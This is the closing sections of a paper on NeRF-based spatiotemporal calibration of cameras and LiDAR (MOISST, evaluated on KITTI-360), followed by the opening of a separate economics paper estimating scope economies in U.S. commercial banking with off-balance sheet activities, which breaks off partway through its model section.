\[\mathcal{R}_{I}\left(\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,_{i}T^{r}\mid \Theta\right). \tag{10}\] Similar reasoning can be made for depth rendering function \(\mathcal{R}_{D}\). Our new formulation of the rendering functions can be integrated in the color loss of equation 6: \[\mathcal{L}_{C}=\sum_{i=1}^{S}\sum_{n_{i}=1}^{N_{i}}\left\|\mathcal{R}_{I} \left(\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,_{i}T^{r}\mid\Theta\right)-I^{n_ {i}}\right\|_{2}^{2}. \tag{11}\] We can replace the depth rendering function in the same manner in equation 7. This leads to our new optimization formulation: \[\left\{\hat{\Theta},{}_{i}\hat{T}^{r},\hat{\delta}_{i}\right\}=\underset{ \Theta_{i}T^{r},\delta_{i}}{\text{argmin}}(\mathcal{L}_{total}), \tag{12}\] with \({}_{i}\hat{T}^{r}\) and \(\delta_{i}\) the only parameters to optimize along with the network weights. Indeed, as the trajectory \(\mathcal{T}_{r}\) is continuous over time, we can also optimize the time offsets \(\delta_{i}\). With the proposed method, we only have to optimize the extrinsic transformation between all sensors and the reference sensor, reducing the number of optimized parameters compared to the full set of frame poses as in equation 9. A summary of our proposal is shown in Fig. 2. ### _Optimization details_ #### Iii-C1 Additional losses for geometric consistency We add two more unsupervised losses using image patches to further improve the geometry of the NeRF model and the proper estimation of calibration parameters. The first loss is the structural dissimilarity (DSSIM) \(\mathcal{L}_{SSIM}\)[31], which minimizes the difference in local 2D structures between the rendered and the input image. The second is the depth smoothness loss \(\mathcal{L}_{DS}\), also used by RegNeRF [32], which regularizes the depth variation in randomly selected patches of the images to reduce variation of the predicted depth. Our final loss function becomes as follows: \[\mathcal{L}_{total}=\lambda_{C}\mathcal{L}_{C}+\lambda_{D}\mathcal{L}_{D}+ \lambda_{SSIM}\mathcal{L}_{SSIM}+\lambda_{DS}\mathcal{L}_{DS} \tag{13}\] with \(\lambda_{C},\lambda_{D},\lambda_{SSIM},\lambda_{DS}\) the weight factor for each loss. #### Iii-C2 Network architecture We use a implicit scene representation similar to the nerfacto model of Nerfstudio2 open source framework. It is inspired by the proposal network introduced in MipNeRF 360 [33] with two proposal radiance fields and one final radiance field that outputs the color and density for the volumetric rendering. The proposals are used to samples points along the rays where the density is high. We use the hash grid introduced in instant NGP [26] for positional encoding and spherical harmonic for directional encoding. We found this model being a good trade-off between speed and accuracy for our spatiotemporal calibration problem. Footnote 2: [https://docs.nerf.studio/en/latest/nerfology/methods/nerfacto.html](https://docs.nerf.studio/en/latest/nerfology/methods/nerfacto.html) #### Iii-C3 Regularization In BARF [12], the idea of low-to-high frequency release for the positional encoding allows smoothness in the scene, which helps the optimization of the poses to avoid local minima. With our architecture using the instant-NGP backbone, we do not have a sinusoidal positional encoding, but a multi-resolution hash grid instead. In order to mimic BARF, we introduce a weight decay to the hash encoder for a few epochs, before removing it, allowing higher frequency information to be learned afterwards. We also wait a few epochs before applying the depth loss \(L_{D}\), as we found that initializing the geometry through visual supervision only help the whole system to converge better. Fig. 2: Overview of MOISST optimization framework. First, the model is initialized with rays generated using rough spatial and temporal calibration priors in addition to the reference frame trajectory. After each optimization step, the rays are regenerated and fed to the NeRF model. We then render RGB images and depth maps which are used along the ground truth ones to compute the losses and propagate the gradients. Gradient descent algorithm is finally used to optimize both NeRF and calibration parameters. #### Iii-C4 Spatiotemporal priors We use spatial calibration prior to initialize the extrinsic parameters of the sensors. For the temporal shift, we set the initial estimate to 0 as we found that our solution was very robust to temporal calibration. Ablation on the sensibility of our method to initial prior is provided in section IV-E. ## IV Experiments We evaluate MOISST on the NVS training set from the recent KITTI-360 dataset [34] which involves difficult static outdoor scenarios with 2 forward and 2 side facing cameras and a top-mounted Velodyne HDL-64E LiDAR sensor. We report results on sequences 0, 1, 2 and 4 and consider the front-left camera as our reference sensor \(r\) for all experiments3. We apply \(\pm 50\) cm translation and \(\pm 5^{\circ}\) rotation offsets on all axes and \(\pm 100\) ms time offset to simulate spatial and temporal calibration errors, respectively. The geodesic distance and the classical \(L_{2}\)-norm are used to report the rotation and translation errors along all axes, and the average error over the last 10 epochs is reported for fairness. Footnote 3: Experiments are not performed on Sequence 3 as it contains missing captures of LiDAR scans. **Implementation details:** Given the sparser supervision signal from re-projected LiDAR depth maps, color and depth losses are balanced by \(\lambda_{C}=1\) and \(\lambda_{D}=20\). Furthermore, as radiance fields require initial optimization to learn depth through color supervision, depth loss is applied after two epochs. Geometric consistency losses are empirically balanced by \(\lambda_{SSIM}=0.1\) and \(\lambda_{DS}=0.0001\). We use the Adam optimizer and train our network during 50 epochs for all experiments. We start with a learning rate of \(1\times 10^{-2}\) for the network parameters and \(5\times 10^{-5}\) for the spatial and temporal parameters, and exponentially decay to a factor of \(1\times 10^{-2}\) of the original learning rate. We apply a weight decay of \(1\times 10^{-6}\) on the network parameters, including the hash grid, then remove the weight decay of the hash grid after 5 epochs as explained in section III-C3. We perform extensive evaluation of our solution upon three different conditions: in section IV-A with a scenario where we consider only spatial extrinsic noise, in section IV-B with only temporal miscalibration and finally in section IV-C by taking into account both spatial and temporal calibration parameters. ### _Spatial Calibration_ In this section, we only consider a spatial error, and remove the time offsets. We only optimize spatial parameters. As we can see in Table I, MOISST estimates calibration parameters with low rotation error, below \(1^{\circ}\) in all sequences. As for translation, we are able to reach around 2 cm of error on the front-right camera, and between 7 cm and 14 cm for the LiDAR. The higher error in LiDAR translation calibration needs to be mitigated because of the relative precision of the provided ground truth, as explained in section IV-D2. ### _Temporal Calibration_ In this section, we only consider a temporal error, and remove the initial spatial error. We only optimize temporal parameters. As shown by the results in Table II, our method in able to temporally calibrate the front-right camera with a precision under 1 ms, despite the high initial time offset of 100 ms or 200 ms, knowing the camera is capturing at around 10 fps. The LiDAR's final temporal error is more variable depending on the scene, reaching around 15 ms at maximum. As mentioned previously, this higher error might partially explain by the relative precision of the provided ground truth (see section IV-D2). ### _Combined Calibration_ In this section, we consider the full initial error as described in section IV. We run MOISST on all four cameras and the LiDAR of the KITTI-360 dataset. We can see in Table III that our method is able to calibrate the 2 side cameras, looking in completely different directions than our reference sensor. The performance is variable depending on the sequence. For example, the sequence 0 is captured in a very narrow road, giving the side cameras a small FOV, reducing the overlap and causing a drop in accuracy. ### _Discussions_ #### Iv-D1 Comparison with structure-based methods We wanted to compare our camera-LiDAR calibration results with the structure-based method from Yuan _et al._[7], but we could only obtain subpar results with their method on the dataset we use (we obtained a mean translation error of 60 cm and 4.08\({}^{\circ}\) of rotational error starting from a translation and rotational error of 50 cm and 5\({}^{\circ}\), respectively, on all axes). We found that it needed a denser point cloud from the LiDAR than what was provided in the KITTI-360 dataset in order to find reliable edge features in the scene. In addition, compare to our solution, this method is not able to do camera/camera and LiDAR/LiDAR calibration, or calibrate temporally. #### Iv-D2 Limitation of KITTI-360 LiDAR ground truth calibration In our experiments, we found that the extrinsic calibration between the front camera and the LiDAR provided by KITTI-360 might be accurate only up to a few centimetres. To show this, we performed the following experiment: we re-projected the LiDAR points into the image captured by the front camera according to: 1) the provided ground truth calibration, 2) the extrinsic calibration we obtained after optimizing the spatiotemporal parameters. We also provide alignment comparison using NeRF generated images at the same location as the LiDAR position on the vehicle to avoid parallax effect. Indeed, the LiDAR is positioned on top of the camera: some points re-projected on the images should not be visible from the camera position. Results are presented in Fig. 3 (more results in the supplementary video). Comparing Fig. 3: Limitation on KITTI-360 LiDAR ground truth calibration: we compare the alignment of re-projected 3D points from the LiDAR on the front image using KITTI extrinsic calibration and our optimized extrinsic calibration. We also re-project the 3D points on a synthetic image generated with the same pose as the LiDAR on the vehicle, in order to avoid parallax effect. the alignment between the re-projected 3D points on the real and synthetic images, we clearly see that our extrinsic calibration seems more accurate than the ground truth we use to compare our results with in this paper. ### _Ablation studies_ For the ablation studies, we only run our experiments on sequence 1. #### V-E1 Rotation vs Translation error By running training with solely rotation or translation errors of varying levels, we could observe that the initial rotation error has more impact on the final accuracy, as we did not get a satisfactory calibration when we introduced 10\({}^{\circ}\) rotation error on all axis. The results are shown in Table IV. On the contrary, the translation error is well-handled, even with 100 cm error set initially on all axis. #### V-E2 Spatiotemporal coupling We run ablation study on the optimized parameters and report the results in Table V and Table VI. It shows that if there is spatial and temporal errors and only one of them is optimized, it is not possible to obtain a correct calibration. Which means it is necessary to take into account both type of error. We can observe in Table VI that optimizing only the spatial parameters allows decent pose errors, showing that they are partly compensating the time offsets. This is possible because sequence 1 is mostly a straight line with the car driving at almost constant speed. #### V-E3 Ablation on additional losses In Table VII, we demonstrate that the overall accuracy of our method increases when \(\mathcal{L}_{SSIM}\) and \(\mathcal{L}_{DS}\) are used. \(\mathcal{L}_{SSIM}\) has the largest impact on the performance as it help the implicit scene representation to learn a proper and sharp geometry from radiometric signals. It makes sense that better scene geometry improves the calibration accuracy, especially between LiDARs and cameras. ## V Conclusions and Future Work We presented in this paper MOISST, a novel approach based on implicit neural scene representation to spatially and temporally calibrate a multi-sensor system. The proposed approach has the advantage of being scalable to any number of cameras and LiDARs by relying on the trajectory of a single reference sensor. The proposed approach does not require any targets, or specific geometric structure within the scene to achieve accurate results. It is fully automatic and relies on gradient descent to optimize calibration parameters. In the future, we expect to address some limitations of the method by calculating the poses of the reference sensor automatically instead of relying on the given ground truth, and by finding a way to bypass the need of priors for the other sensors. We would also like to add larger compatibility to other types of sensor, such as rolling shutter cameras or distorted LiDARs, and the optimization of intrinsic parameters. Finally, we would implement the multi-scene optimization, which should improve robustness by relying on more varied scenes to optimize a specific multi-sensor system.
2302.14603
Off-Balance Sheet Activities and Scope Economies in U.S. Banking
Propelled by the recent financial product innovations involving derivatives, securitization and mortgages, commercial banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in a pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing (two-decade-old) empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, making the portfolio of products offered by present-day banks very different from that two decades ago. In this paper, we provide new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent data and accounting for bank's nontraditional off-balance sheet operations, but also in multiple methodological ways. To test for scope economies, we estimate a flexible time-varying-coefficient panel-data quantile regression model which accommodates three-way heterogeneity across banks. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies.
Jingfang Zhang, Emir Malikov
2023-02-26T22:56:20Z
http://arxiv.org/abs/2302.14603v1
# Off-Balance Sheet Activities and Scope Economies in U.S. Banking+ ###### Abstract Propelled by the recent financial product innovations involving derivatives, securitization and mortgages, commercial banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in a pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing (two-decade-old) empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, making the portfolio of products offered by present-day banks very different from that two decades ago. In this paper, we provide new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent data and accounting for bank's nontraditional off-balance sheet operations, but also in multiple methodological ways. To test for scope economies, we estimate a flexible time-varying-coefficient panel-data quantile regression model which accommodates three-way heterogeneity across banks. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies. **Keywords**: bank, cost subadditivity, nontraditional banking, off-balance sheet, product scope, scope economies **JEL Classification**: G21, L25, D24 Introduction Just like in other industries, executive managers in banking must choose the optimal scope of operations. Despite the long-lasting implications of this strategic choice for firm performance, the dichotomy between operational "focus" and breadth remains unsettled from the corporate strategy perspective. The common arguments for limited-scope operations a la Skinner (1974a,b) usually feature cost and quality benefits associated with more specialized expertise and tacit knowledge, lessened complexity, diminished technological uncertainty, etc. On the other hand, there may be a strong incentive to diversify revenue streams by broadening the firm's product mix in order to capitalize on potential scope-driven cost savings and thereby increase firm value (see Panzar and Willig, 1981; Rumelt, 1982; Villalonga, 2004). When it comes to commercial banking, leveraging operational scope and breadth thereof continues to play a vital role in operations management. The scope of bank operations has also been a subject of intense policy debate, thereby expanding practical importance of understanding the relation between operational scope and bank performance beyond industry managers and stakeholders. Namely, the financial crisis of 2007-2008 and the ensuing Great Recession turned attention of policy-makers and academics alike onto large "too-big-to-fail" (TBTF) commercial banks and the serious systemic risks that they pose. The emergence of behemoth banks due to deregulation as well as technological innovations (including those in information technologies) has given rise to concerns about the costs that such "systemically important financial institutions" impose on the economy and fueled policy debates about whether banks should be subject to size limitations, even including the talks of break-up. These policy discussions have led to the enactment of new financial regulations such as the Dodd-Frank Wall Street Reform and the Consumer Protection Act of 2010 that seek to eliminate the TBTF doctrine by setting restrictions on the scale and scope of bank operations. However, the potential cost savings associated with operating at a large scale with a more diversified scope of revenue-generating activities, which are to be forgone owing to the new regulations, have been by and large neglected in these policy discussions. Large banks may derive such cost efficiency benefits from their ability to offer financial services at lower average cost due to (_i_) "scale economies" driven by the increasing returns to scale as well as (_ii_) their unique position to innovate and expand the scope of offered financial products and thereby economize costs ("scope economies") via input complementarities and positive spillovers (see Markides and Williamson, 1994; Milgrom and Roberts, 1995) as well as, in the case of commercial banking, risk diversification across different products (e.g., Rossi et al., 2009). In theory, these cost savings are passed onto customers in the form of lower net interest margins. This raises an important policy and research question about significance of the trade-off between lower systemic risk pursued by the newly enacted regulations and the cost savings that banks may be forced to forgo as a result. Both have non-negligible implications for consumer welfare. It is therefore imperative to investigate the prevalence of scale and scope economies in banking in order to not only shed light on potential unintended consequences of the financial reforms already put in place but also to inform future policies and regulations. This information also can help banks in formulating optimal product-scope operational strategies. While studies of scale economies in commercial banking are many, the attempts to measure _scope economies_ are however scant and outdated. The latter is especially lacking given the introduction of many "nontraditional" financial product innovations involving derivatives, securitization and mortgages by the large banks in the past two decades that have allowed them to expand the scope of their revenue-earning operations. The objective of this paper is to fill in this gap. Early studies of scale economies in banking date as far back as Berger et al. (1987), Mester (1987, 1992) and Hughes and Mester (1993, 1998) to name a few, and with the passage of new financial reforms, this body of research has only been growing. No matter the methods employed, most recent studies find empirical evidence in support of the statistically significant increasing returns to scale in the U.S. banking sector. Some find significant scale economies mostly for large commercial banks (e.g., Wheelock and Wilson, 2012; Hughes and Mester, 2013; Restrepo-Tobon and Kumbhakar, 2015); others find economies of scale for medium and small banks as well (e.g., Malikov et al., 2015; Restrepo-Tobon et al., 2015; Wheelock and Wilson, 2018). With the sole exception,1 there however have been virtually no attempt to investigate product scope economies in banking over the past two decades despite the drastic transformations that this sector has undergone during that time. This perhaps can be attributed to the lack of empirical evidence in support of statistically and/or economically significant scope economies among U.S. commercial banks documented in the 1980s and 1990s; e.g., see Berger et al. (1987), Mester (1987), Hughes and Mester (1993), Pulley and Braunstein (1992), Ferrier et al. (1993), Pulley and Humphrey (1993), Jagtiani et al. (1995), Jagtiani and Khanthavit (1996), Wheelock and Wilson (2001). It makes scope economies in the present-day banking sector be a seriously overlooked issue because the technological advancements along with regulatory changes have restructured the U.S. banking industry dramatically, especially since the passage of the Gramm-Leach-Bliley Act in 1999, which largely lifted the restrictions prohibiting the consolidation of commercial banks, investment banks, securities firms and insurance companies. U.S. banks have since experienced a drastic shift from traditional banking activities (viz., issuance of loans) towards the nontraditional activities such as investment banking, venture capital, security brokerage, insurance underwriting and asset securitization (DeYoung and Torna, 2013), and the portfolio of products offered by the modern banks is very different from that two decades ago, underscoring the importance of our study. Footnote 1: To our knowledge, Yuan and Phillips (2008) who explicitly recognize the role of nontraditional banking activities (namely, insurance) is the only attempt at measuring scope economies in the U.S. banking post 2000. Their analysis looks at a single nontraditional operation and stops at 2005, which obviously excludes the most relevant period after the structural-change-inducing financial crisis. While nontraditional banking operations are usually associated with banks' all other non-interest fee-generating activities related to participating in capital markets, the off-balance sheet banking represents one of the major forms of such nontraditional activities. It chiefly consists of contingent claims/contracts that involve obligations to lend or provide funds should the contingency be realized and, unlike the traditional interest-income-centered transactions, these off-balance sheet activities are not recorded on the bank's balance sheet (Hassan, 1993; Hassan and Sackley, 1994). For example, an interest-earning loan is considered an asset on the bank's balance sheet, whereas a promise to make a loan is an off-balance sheet item since it involves only a _potential_ funding obligation in the future, albeit, for which the bank earns a fee. Broadly, off-balance sheet items can be categorized into four groups including guarantees, commitments, market-related activities, and advisory or management functions (e.g., see Perera et al., 2014). Such off-balance sheet banking operations are well-documented to substantially influence banks' financial performance including profitability and risk profiles (e.g., Siroh, 2004; Laeven and Levine, 2007; Apergis, 2014), and omitting these revenue-earning operations in the analysis of banking technology may lead to erroneous inference and conclusions due to misspecification (see Clark and Siems, 2002; Rime and Stiroh, 2003; Casu and Girardone, 2005; Lozano-Vivas and Pasiouras, 2010). When testing for scope economies, we therefore recognize off-balance sheet operations as another one of the bank's revenue-generating outputs. In this paper, we contribute to the literature by providing new and more robust evidence about scope economies in U.S. commercial banking. We improve upon the prior literature not only by analyzing the most recent and relevant data (2009-2018) and accounting for bank's nontraditional non-interest-centered operations, but also in multiple methodological ways as follows. In a pursuit of robust estimates of scope economies and statistical inference thereon, we estimate a flexible, yet parsimonious, time-varying-coefficient panel-data quantile regression model which accommodates (_i_) distributional heterogeneity in the cost structure of banks along the size of their costs, (_ii_) temporal variation in cost complementarities and spillovers due to technological change/innovation, and (_iii_) unobserved bank heterogeneity (e.g., latent management quality) that, if unaccounted, confounds the estimates. Our analysis is structural in that we explicitly estimate a model of bank cost structure which facilitates the measurement of counterfactual costs necessary to test for scope economies. By employing a quantile approach, we are able to capture distributional heterogeneity in the bank cost structure. Unlike the traditional regression models that focus on the conditional mean only, quantile regression provides a complete description of the relationship between the distribution of bank costs and its determinants. Since banks of varying size/scale are highly heterogeneous in their operations (e.g., see Wheelock and Wilson, 2012), it is reasonable to expect that large- and small-scale banks exhibit different scope-driven potential for cost saving (if any) and, therefore, there remains much untapped benefit of examining scope economies in banking via quantile analysis. Thus, contrary to all prior studies of scope economies in banking which provide evidence solely for _average_ costs via conventional conditional-mean regressions, we focus our analysis on conditional _quantiles_ of the bank cost distribution, with the bank's operating cost being a good proxy for its size/scale. Not only does this approach enable us to accommodate potential heterogeneity in the prevalence of scope economies among banks of different sizes, but it is also more robust to the error distributions including the presence of outliers in the data. Furthermore, it exhibits a useful equivariance property thereby letting us avoid biases in the scope economies computations that numerous earlier studies suffer from (to be discussed later). To operationalize our analysis, we employ the recently developed quantile estimator (Machado and Santos Silva, 2019) that we extend to allow temporal variation of unknown form in the parameters in order to flexibly capture the impact of technological innovations on bank operations and costs. Our empirical results provide strong evidence in support of statistically significant scope economies across banks virtually of all sizes in the U.S. banking sector. Among banks between the bottom 10th and top 90th percentiles of the cost distribution, 92% or more exhibit positive economies of scope. The prevalence of significant scope economies in median banks is 99%. Even under the alternative model specifications that produce smaller point estimates, the evidence in support of scope economies in U.S. banking remains strong, with at least 89% of mid-cost banks found to enjoy product-scope-driven cost savings. We also find no empirical corroboration for scope _dis_economies. Overall, our findings are in stark contrast with earlier studies. The rest of the paper unfolds as follows. Section 2 discusses the theoretical framework. Section 3 describes our econometric model. Data are discussed in Section 4, followed by Section 5 that reports the empirical results. We then conclude in Section 6. ## 2 Theory of Multi-Product Costs In order to test if there is an untapped cost savings potential for commercial banks due to scope economies, we need to formally model their cost structure. Following the convention in the banking literature, we do so using the dual cost approach. Not only is this approach convenient because it facilitates the direct measurement of the bank's costs via the estimated dual cost function necessary for testing for scope economies, but it also does not require the use of input quantities during the estimation (unlike in the primal production approach) which can lead to simultaneity problems since input allocations are the bank's endogenous decision whereas input prices are widely accepted as being exogenously determined owing to competition in the factor market including that for deposits. A model of bank costs calls for specification of the outputs and inputs of bank production. Given the bank's core functions as a financial intermediary, most studies in the literature adopt Sealey and Lindley's (1977) "intermediation approach" which focuses on the bank's production of intermediation services and the associated costs inclusive of both the interest and operating expenses. In this paradigm, the revenue-generating financial assets such as loans and trading securities are conceptualized as outputs, whereas inputs are typically specified to include labor, physical capital, deposits and other borrowed funds as well as equity capital (for an excellent review, see Hughes and Mester, 2015). Given the recent industry trends and the growing importance of nontraditional income-earning activities that banks engage in, we also include an output measure of non-interest off-balance sheet income. Together with loans and securities, this makes a total of \(M=3\) outputs. Concretely, we formalize the bank's cost structure via the following multi-product dual variable cost function: \[\mathcal{C}_{t}(\mathbf{Y},\mathbf{W},\mathbf{K})=\min_{\mathbf{X}\in\mathbf{0}}\left\{\mathbf{X}^{ \prime}\mathbf{W}\mid(\mathbf{X},\mathbf{K})\text{ can produce }\mathbf{Y}\text{ at time }t\right\}, \tag{2.1}\] where the arguments of cost function \(\mathcal{C}_{t}(\cdot)\) are the output quantities \(\mathbf{Y}\in\Re_{+}^{M}\), variable input prices \(\mathbf{W}\in\Re_{+}^{J}\) and fixed input quantities \(\mathbf{K}\in\Re_{+}^{P}\); and \(\mathbf{X}\in\Re_{+}^{J}\) is the vector of variable input quantities. Importantly, the cost function in (2.1) is time-varying thereby accommodating the evolution of the bank cost structure over time in the face of technological advancements and regulatory changes. The multi-product firm's cost structure is said to exhibit scope economies if its average cost is de creasing in the number of outputs/operations (Panzar and Willig, 1981). Commercial banks may achieve such cost savings by spreading fixed costs (e.g., branch costs and data processing costs) over the more diversified output mix (fixed asset amortization) which now, more often than not, includes nontraditional off-balance sheet operations. Scope economies may also arise from positive spillovers via the (re)use of "public inputs" such as client credit information and customer relations as well as intangible assets including tacit knowledge and know-hows. Complementarities across different products can play a big role too. For example, some off-balance sheet operations such as loan commitments (which generate income for banks via fees) essentially represent a technological expansion of traditional lending at a little cost added. At the same time, they can help banks expand the scope of their customer relationship with all the cost-saving informational gains that come with it (Berger and Udell, 1995; Das and Nanda, 1999; Degryse and Van Cayseele, 2000). Banks can also reuse the information gathered when issuing loans to reduce the searching or monitoring requirements of the off-balance sheet activities. To test for the potential for scope-driven cost savings, we use an expansion-path measure of subadditivity of the bank's cost function a la Berger et al. (1987), with the rationale being that subadditivity sheds light on scope economies, the presence of which is a necessary condition for the former (see Baumol et al., 1982; Evans and Heckman, 1984). Specifically, the subadditivity measure relies on comparison of the costs of smaller _multi_-output banks of _differential_ degrees of specialization with the cost of a larger, more diversified bank.2 Intuitively, this approach zeroes in on scope economies from a perspective of relative--as opposed to absolute--notion of revenue diversification. Then, for some distribution weights \(0\leq\omega_{m}^{\kappa}\leq 1\) such that \(\sum_{\kappa}\omega_{m}^{\kappa}=1\) for all \(m=1,2,3\) and \(\kappa\in\{A,B,C\}\), the bank is said to enjoy scope economies at time \(t\) if Footnote 2: While preserving the equality of total output quantities on both sides, of course. \[\sum_{\kappa\in\{A,B,C\}}\mathcal{C}_{t}\big{(}\partial_{1}^{\kappa}Y_{1}, \partial_{2}^{\kappa}Y_{2},\partial_{3}^{\kappa}Y_{3}\big{)}-\mathcal{C}_{t} \big{(}Y_{1},Y_{2},Y_{3}\big{)}>0, \tag{2.2}\] where we have suppressed all arguments of the cost function besides outputs. While the above methodology deviates from the conventional definition of scope economies (Baumol et al., 1982) which relies on the comparison of the cost of producing outputs individually with the cost of their joint production, whereby the bank is said to enjoy scope economies if \(\mathcal{C}_{t}(Y_{1},0,0)+\mathcal{C}_{t}(0,Y_{2},0)+\mathcal{C}_{t}(0,0,Y_ {3})-\mathcal{C}_{t}(Y_{1},Y_{2},Y_{3})>0\), it is both more realistic and robust. This is so because it does not require computation of the counterfactual cost of producing each output separately by a fully specialized _single_-output bank, which naturally suffers from "excessive extrapolation" (Evans and Heckman, 1984; Hughes and Mester, 1993) since the counterfactuals require extrapolation of the estimated multi-output cost function to its boundaries corresponding to the _non-existent_ single-output specializations. Also, the conventional measure of scope economies is just a special case of (2.2) with a pair of weights taking zero values for each counterfactual bank. To further avoid excessive extrapolation, we restrict the choice of \(\{\omega_{m}\}\) to the "admissible region" defined by the two data-driven constraints, following Evans and Heckman (1984). First, each counterfactual bank is ensured to not produce less of each output than banks do in the sample. That is, we require that \(\omega_{m}^{\kappa}Y_{m}\geq\min\{Y_{m}\}\) for all \(m=1,2,3\) and \(\kappa\in\{A,B,C\}\). The second constraint ensures that each counterfactual bank does not specialize in either one of the outputs to a greater extent than banks do in the sample. In other words, ratios of output quantities for each counterfactual bank must fall in the range of such ratios observed in the data, i.e., for any pair \(Y_{m}\) and \(Y_{m^{\prime}}\): \[\min\left\{\frac{Y_{m}}{Y_{m^{\prime}}}\right\}\leq\frac{\varpi_{m}^{\kappa}Y_{ m}^{\ast}+\min\{Y_{m}\}}{\varpi_{m^{\prime}}^{\kappa}Y_{m^{\prime}}^{\ast}+ \min\{Y_{m^{\prime}}\}}\leq\max\left\{\frac{Y_{m}}{Y_{m^{\prime}}}\right\}, \tag{2.3}\] where \(Y_{m}^{\ast}=Y_{m}-3\times\min\{Y_{m}\}\) for all \(m=1,2,3\). Thus, we examine the _within-sample_ scope economies. The quantitative measure of cost subadditivity \(\mathcal{S}_{t}\) (in proportions) is obtained by dividing the expression in (2.2) by \(\mathcal{C}_{t}(Y_{1},Y_{2},Y_{3})\): \[\mathcal{S}_{t}=\frac{\sum_{\kappa\in\{A,B,C\}}\mathcal{C}_{t} \Big{(}\varpi_{1}^{\kappa}Y_{1}^{\ast}+\min\{Y_{1}\},\varpi_{2}^{\kappa}Y_{2}^ {\ast}+\min\{Y_{2}\},\varpi_{3}^{\kappa}Y_{3}^{\ast}+\min\{Y_{3}\}\Big{)}- \mathcal{C}_{t}\big{(}Y_{1},Y_{2},Y_{3}\big{)}}{\mathcal{C}_{t}\big{(}Y_{1}, Y_{2},Y_{3}\big{)}}, \tag{2.4}\] where the counterfactual costs under the summation operator have been redefined in order to operationalize the first of the two constraints characterizing the admissible region. Positive (negative) values of \(\mathcal{S}_{t}\) provide evidence of scope economies (_dis_economies); while a zero value suggests scope invariance of the bank's cost structure. Clearly however, the value of \(\mathcal{S}_{t}\) depends on the choice of distribution weights \(\{\varpi_{m}^{\kappa}\}\). To test for scope economies, we adopt a conservative approach to measuring cost subadditivity, whereby \(\{\varpi_{m}^{\kappa}\}\) are chosen such that the corresponding \(\mathcal{S}_{t}\) is the smallest. With this, "the" measure of cost subadditivity (for each bank-year) is \[\mathcal{S}_{t}^{\ast}=\min_{\{\varpi_{m}^{\kappa}\}}\mathcal{S}_{t} \big{(}\varpi_{m}^{\kappa};\;m=1,2,3;\kappa\in\{A,B,C\}\big{)}\;. \tag{2.5}\] The rationale is as follows. If the _smallest_ subadditivity measure is still positive, then one can quite safely infer that scope economies are locally significant over the bank's feasible output space in a given year. Thus, the main hypothesis of interest is as follows. Hypothesis.--_Consistent with scope economies at time \(t\), the cost subadditivity measure \(\mathcal{S}_{t}^{\ast}>0\)._ ## 3 Empirical Model We estimate the banks dual variable cost function \(\mathcal{C}_{t}(\cdot)\) at different conditional quantiles of costs. Let \(C_{it}\) be the variable cost of a bank \(i=1,\ldots,n\) in year \(t=1,\ldots,T\) and \(\mathbf{V}_{it}=(\mathbf{Y}_{it}^{\prime},\mathbf{W}_{it}^{\prime},\mathbf{K}_{it}^{\prime})^{\prime}\) be the vector of (strictly exogenous) cost-function regressors. We use lower case of \(C_{it}\) and \(\mathbf{V}_{it}\) in the following to denote the log transformations of the variables: e.g., \(\mathbf{v}_{it}=\ln\mathbf{V}_{it}\). Letting the banks variable cost structure be of the translog3 form and described by a location-scale model a la Koenker and Bassett (1982) extended to accommodate bank fixed effects and time-varying coefficients, we have Footnote 3: Quadratic log-polynomial. \[c_{it}=\big{[}\beta_{0}+\beta_{0}^{\ast}L(t)\big{]}+\big{[}\mathbf{ \beta}_{1}+\mathbf{\beta}_{1}^{\ast}L(t)\big{]}^{\prime}\mathbf{v}_{it}+\tfrac{1}{2} \big{[}\mathbf{\beta}_{2}+\mathbf{\beta}_{2}^{\ast}L(t)\big{]}^{\prime}\text{vec} \big{(}\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\big{)}+\lambda_{i}+u_{it}, \tag{3.1}\] with \[u_{it}=\Big{(}\big{[}\gamma_{0}+\gamma_{0}^{\ast}S(t)\big{]}+ \big{[}\mathbf{\gamma}_{1}+\mathbf{\gamma}_{1}^{\ast}S(t)\big{]}^{\prime}\mathbf{v}_{it}+ \tfrac{1}{2}\big{[}\mathbf{Y}_{2}+\mathbf{\gamma}_{2}^{\ast}S(t)\big{]}^{\prime}\text{ vec}\big{(}\mathbf{v}_{it}\mathbf{v}_{it}^{\prime}\big{)}+\sigma_{i}\Big{)}\epsilon_{ it}, \tag{3.2}\] where \(\left(\beta_{0},\mathbf{\beta}_{1}^{\prime},\mathbf{\beta}_{2}^{\prime},\beta_{0}^{*}, \mathbf{\beta}_{1}^{*}{}^{\prime},\mathbf{\beta}_{2}^{*}{}^{\prime}\right)^{\prime}\) are unknown location-function coefficients; \(\left(\gamma_{0},\mathbf{\gamma}_{1}^{\prime},\mathbf{\gamma}_{2}^{\prime},\mathbf{\gamma}_ {0}^{*}{}^{\prime},\mathbf{\gamma}_{1}^{*}{}^{\prime},\mathbf{\gamma}_{2}^{*}{}^{\prime }\right)^{\prime}\) are unknown scale-function coefficients; and \(\lambda_{i}\) and \(\sigma_{i}\) are the unobserved bank-specific location and scale fixed effects, respectively. To allow for technological change in the bank cost structure, we borrow from Baltagi and Griffin (1988) and introduce two scalar time indices \(L(t)\) and \(S(t)\). Both time indices are unobservable and can be thought of as the unknown functions of time. Such time indices are advantageous over simple trends (including quadratic) in modeling temporal changes because they provide richer variation in the measurement of technological change and much closer approximation to observed temporal changes than do the simple time trends. Note that 